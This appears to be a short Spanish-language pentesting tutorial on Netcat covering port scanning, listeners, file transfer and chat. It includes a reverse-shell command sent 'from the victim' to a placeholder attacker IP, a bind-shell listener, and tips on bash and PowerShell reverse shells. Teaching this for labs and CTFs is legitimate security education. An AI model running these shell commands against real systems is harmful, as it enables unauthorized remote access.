Netcat, también conocido como nc, es como ese amigo que sabe hacer de todo:
escanea puertos, escucha conexiones, abre shells, transfiere archivos… y más.
En el mundo del pentesting, es un must-have felino 😼🛠️

🧠 ¿Qué es Netcat?

Netcat es una herramienta en línea de comandos que permite interactuar con conexiones de red TCP/UDP.
Su simplicidad y versatilidad la convierten en una navaja suiza de la red.

🚀 ¿Para qué se usa?

• Escanear puertos
• Enviar/recibir datos a través de sockets
• Crear conexiones reversas o bind shells
• Transferir archivos entre hosts
• Actuar como cliente o servidor

🛠️ Sintaxis básica

nc [opciones] [host] [puerto]

🎯 Ejemplos útiles en pentesting

📡 Escaneo de puertos

nc -zv 192.168.1.1 20-80

-z: escaneo sin enviar datos
-v: modo verbose

🧪 Servidor de escucha (bind shell)

nc -lvp 4444

🐚 Conexión reversa desde la víctima

nc <IP atacante> 4444 -e /bin/bash

-e: ejecuta un programa cuando se conecta (ojo: puede no estar disponible en versiones modernas por seguridad)

🔁 Transferencia de archivos

En la máquina receptora:

nc -lvp 4444 > archivo.txt

En la máquina emisora:

nc <IP objetivo> 4444 < archivo.txt

🐾 Chat entre dos equipos

Host A:

nc -lvp 1234

Host B:

nc <IP de A> 1234

🔐 Tips ofensivos

• Usa Netcat junto con reverse shells en payloads de Metasploit
• Muy útil en CTFs para “catch the flag” o comunicarse entre máquinas comprometidas
• Si no tienes nc, a veces puedes encontrarlo como ncat (versión de Nmap)

🛡️ Alternativas cuando Netcat no funciona

• socat: más potente, pero más complejo
• bash -i con redirección de sockets
• powershell en Windows para conexiones reversas

🚩 Conclusión

Netcat es simple pero poderoso.
Cuando se trata de conexiones crudas, shells improvisadas o escaneo ligero, este comando puede sacarte de muchos apuros… o meterte en problemas, si estás del lado oscuro 😏

✨ “El gato que sabe escuchar… también sabe atacar.” — l1ttl3bugc4t